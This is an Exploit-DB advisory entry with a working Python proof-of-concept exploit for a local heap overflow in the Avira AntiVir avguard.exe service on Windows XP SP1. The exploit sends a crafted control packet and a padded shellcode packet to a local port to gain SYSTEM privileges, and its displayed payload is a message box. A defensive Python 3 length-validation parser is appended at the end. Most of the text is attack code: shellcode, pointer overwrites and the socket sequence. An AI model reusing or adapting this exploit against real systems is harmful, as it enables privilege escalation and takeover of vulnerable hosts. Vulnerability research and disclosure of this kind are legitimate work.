Avira AntiVir Personal – Multiple Code Execution Vulnerabilities (2)

  • Author: D.Elser
    Date: 2011-01-14
  • Category:
    Platform:
  • Source: https://www.exploit-db.com/exploits/35226/
  • Source: https://www.securityfocus.com/bid/45807/info
     
Avira AntiVir Personal is prone to multiple code-execution vulnerabilities.

Successful exploits may allow an attacker to execute arbitrary code with SYSTEM-level privileges. Failed exploit attempts will likely result in denial-of-service conditions.

Please note that these issues affect versions of the application that are no longer supported.
    
#
# Avira AntiVir personal edition avguard.exe 7.00.00.52 local heap overflow
# Proof of Concept (PoC) exploit / target: WinXP SP1
# bug discovered/exploit written by D.Elser
#
# by sending two simple TCP packets which will
# exploit a vulnerability in the Antivir guard
# service, the user will gain SYSTEM privileges
#
# this PoC code will cause the avguard service
# to show a messagebox within an infinite loop


from socket import *
import sys

# the first packet which is sent must
# contain a magic ID at offset 0x18
# and the length of the second packet
# to receive
#
# offset 0x18 : magic ID
# offset 0x1C : length of buffer for second packet


cpacket = "\x00\x00\x00\x00" \
"\x00\x00\x00\x00" \
"\x00\x00\x00\x00" \
"\x00\x00\x00\x00" \
"\x00\x00\x00\x00" \
"\x00\x00\x00\x00" \
"\x00\x00\x31\x06" \
"\x00\x00\x00\x40"


lyrics = "\x42\x72\x65\x61\x6B\x62\x65\x61\x74\x20\x45\x72\x61\x20\x2D\x20" \
     "\x42\x75\x6C\x6C\x69\x74\x70\x72\x6F\x6F\x66\x0D\x0A\x0D\x0A\x45" \
     "\x6C\x65\x63\x74\x72\x69\x66\x79\x20\x6D\x65\x20\x79\x6F\x75\x20" \
     "\x6D\x79\x20\x68\x61\x6C\x66\x20\x62\x61\x6B\x65\x64\x20\x79\x6F" \
     "\x75\x74\x68\x0D\x0A\x49\x20\x6D\x65\x6D\x6F\x72\x69\x73\x65\x20" \
     "\x79\x6F\x75\x72\x20\x66\x61\x63\x65\x20\x73\x6F\x20\x49\x20\x77" \
     "\x6F\x6E\x27\x74\x20\x66\x6F\x72\x67\x65\x74\x20\x79\x6F\x75\x0D" \
     "\x0A\x44\x61\x6E\x63\x69\x6E\x67\x20\x64\x65\x6D\x6F\x6E\x73\x20" \
     "\x69\x6E\x20\x74\x68\x65\x20\x66\x69\x72\x65\x6C\x69\x67\x68\x74" \
     "\x20\x79\x65\x73\x20\x69\x74\x27\x73\x20\x74\x72\x75\x65\x0D\x0A" \
     "\x52\x65\x6D\x69\x6E\x64\x20\x6D\x65\x20\x6F\x66\x20\x74\x68\x65" \
     "\x20\x6E\x69\x67\x68\x74\x20\x49\x20\x66\x69\x72\x73\x74\x20\x6D" \
     "\x65\x74\x20\x79\x6F\x75\x0D\x0A\x43\x72\x69\x74\x69\x63\x69\x73" \
     "\x65\x20\x6D\x65\x20\x66\x6F\x72\x20\x6D\x79\x20\x6D\x69\x73\x2D" \
     "\x73\x70\x65\x6E\x74\x20\x79\x6F\x75\x74\x68\x0D\x0A\x4E\x6F\x20" \
     "\x74\x68\x72\x69\x6C\x6C\x20\x6E\x6F\x20\x6C\x69\x65\x20\x6D\x6F" \
     "\x72\x65\x20\x63\x72\x61\x7A\x79\x20\x74\x68\x61\x6E\x20\x74\x68" \
     "\x65\x20\x74\x72\x75\x74\x68\x0D\x0A\x59\x6F\x75\x20\x67\x69\x76" \
     "\x65\x20\x6D\x65\x20\x70\x72\x65\x63\x69\x6F\x75\x73\x20\x74\x68" \
     "\x69\x6E\x67\x73\x20\x49\x20\x74\x68\x72\x6F\x77\x20\x74\x68\x65" \
     "\x6D\x20\x61\x6C\x6C\x20\x61\x77\x61\x79\x0D\x0A\x41\x6E\x64\x20" \
     "\x6E\x6F\x77\x20\x79\x6F\x75\x20\x66\x72\x65\x65\x20\x6D\x79\x20" \
     "\x62\x72\x65\x61\x74\x68\x20\x79\x6F\x75\x72\x20\x73\x63\x61\x72" \
     "\x65\x64\x20\x77\x68\x61\x74\x20\x49\x20\x6D\x69\x67\x68\x74\x20" \
     "\x73\x61\x79\x0D\x0A\x0D\x0A\x53\x70\x65\x61\x6B\x20\x6E\x6F\x20" \
     "\x6C\x69\x65\x2C\x20\x49\x20\x74\x65\x6C\x6C\x20\x74\x68\x65\x20" \
     "\x74\x72\x75\x74\x68\x0D\x0A\x53\x61\x76\x65\x20\x6D\x79\x20\x62" \
     "\x72\x65\x61\x74\x68\x20\x79\x6F\x75\x20\x62\x72\x65\x61\x6B\x20" \
     "\x74\x68\x65\x20\x72\x75\x6C\x65\x73\x0D\x0A\x54\x69\x6D\x65\x20" \
     "\x77\x69\x6C\x6C\x20\x74\x65\x6C\x6C\x20\x79\x65\x61\x68\x20\x77" \
     "\x68\x6F\x20\x69\x73\x20\x77\x68\x6F\x0D\x0A\x53\x69\x64\x65\x20" \
     "\x62\x79\x20\x73\x69\x64\x65\x20\x77\x65\x27\x72\x65\x20\x62\x75" \
     "\x6C\x6C\x69\x74\x70\x72\x6F\x6F\x66\x00"
    
    
# main part of shellcode
shellcode = "\x90\x8d\x46\x1b" \
"\x50\x05\x04\x00" \
"\x00\x00\x50\x05" \
"\x19\x00\x00\x00" \
"\x50\xb8\x2f\x71" \
"\x42\x00\xff\xd0" \
"\x90\xeb\xe5\x10" \
"\x20\x01\x00" \
"I got SYSTEM privileges!\x00" + lyrics

# fill shellcode up to a specific length
for i in range(0, 0x4000 - 0x20 - len(shellcode)):
    shellcode = shellcode + "\x40"

# second part of shellcode which contains
# the pointers to be overwritten and code
# which jumps to main part of our shellcode
shellcode = shellcode + "\xEB\x0E\x90\x90" \
"\x90\x90\x90\x90" \
"\x52\xBF\x04\x78" \
"\xB4\x73\xED\x77" \
"\x8B\x57\x6C\x8B" \
"\xF2\x81\xEE\xE0" \
"\x3F\x00\x00\xFF" \
"\xE6\x90\x90\x90" \
"\x90\x90\x90\x90" \
"\x90\x90\x90\x90"

s = socket(AF_INET,SOCK_STREAM)
s.settimeout(1)
s.connect(("127.0.0.1",18350))
print "Avira Antivir avguard.exe 7.00.00.52 local heap overflow.\n" \
"Exploit compatible with XP SP1.\n"

print "Sending control packet (size: 0x%x)" % (len(cpacket))
s.sendall(cpacket)
print "Sending shellcode packet (size: 0x%x)" % (len(shellcode))
s.sendall(shellcode)
print "avguard response:"
print s.recv(1024)
sys.exit()
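As an added, defender-side illustration (not part of the original PoC or of Avira's code), the following Python 3 receiver parses the control-packet layout the comments above describe, magic ID at offset 0x18 and second-packet length at offset 0x1C, and bounds that peer-supplied length before anything is allocated or received. The little-endian field encoding, the 0x06310000 magic value, the 0x4000-byte buffer ceiling and the check_exchange helper are assumptions made here for illustration.

```python
import struct

CONTROL_LEN = 0x20          # size of the PoC's control packet
MAGIC_OFFSET = 0x18         # "offset 0x18 : magic ID"
LENGTH_OFFSET = 0x1C        # "offset 0x1C : length of buffer for second packet"
MAGIC_ID = 0x06310000       # bytes 00 00 31 06 read little-endian (assumed)
MAX_PAYLOAD = 0x4000        # assumed fixed-size receive buffer for packet two

class ProtocolError(ValueError):
    """Any header the receiver should refuse rather than trust."""

def parse_control(packet: bytes) -> tuple:
    """Return (magic, declared_len) from a 0x20-byte control packet."""
    if len(packet) != CONTROL_LEN:
        raise ProtocolError("control packet must be 0x%x bytes" % CONTROL_LEN)
    magic = struct.unpack_from("<I", packet, MAGIC_OFFSET)[0]
    declared = struct.unpack_from("<I", packet, LENGTH_OFFSET)[0]
    return magic, declared

def bounded_length(declared: int) -> int:
    """Validate the peer-supplied length BEFORE allocating or calling recv."""
    if declared == 0 or declared > MAX_PAYLOAD:
        raise ProtocolError("declared length 0x%x exceeds buffer 0x%x"
                            % (declared, MAX_PAYLOAD))
    return declared

def check_exchange(control: bytes, payload: bytes) -> str:
    """Classify a captured control/payload pair as 'ok' or a rejection reason."""
    try:
        magic, declared = parse_control(control)
        if magic != MAGIC_ID:
            return "reject: bad magic 0x%08x" % magic
        n = bounded_length(declared)
    except ProtocolError as err:
        return "reject: %s" % err
    if len(payload) != n:   # never accept more bytes than the validated length
        return "reject: payload 0x%x bytes, header declared 0x%x" % (len(payload), n)
    return "ok"

# Constructed inputs: the PoC's own control packet, a payload of the PoC's size
# (0x4000 - 0x20 padded main part plus the 40-byte tail), and a sane exchange.
POC_CONTROL = b"\x00" * MAGIC_OFFSET + b"\x00\x00\x31\x06" + b"\x00\x00\x00\x40"
POC_PAYLOAD = b"\x40" * (0x4000 - 0x20 + 40)
SANE_CONTROL = b"\x00" * MAGIC_OFFSET + struct.pack("<II", MAGIC_ID, 0x100)

if __name__ == "__main__":
    print(check_exchange(POC_CONTROL, POC_PAYLOAD))        # rejected at the length check
    print(check_exchange(SANE_CONTROL, b"\x00" * 0x100))   # ok
```

The same check is what a service should apply before it ever trusts a length field from the network: the PoC's control packet fails at the bounds check, so the second packet is never read into a buffer.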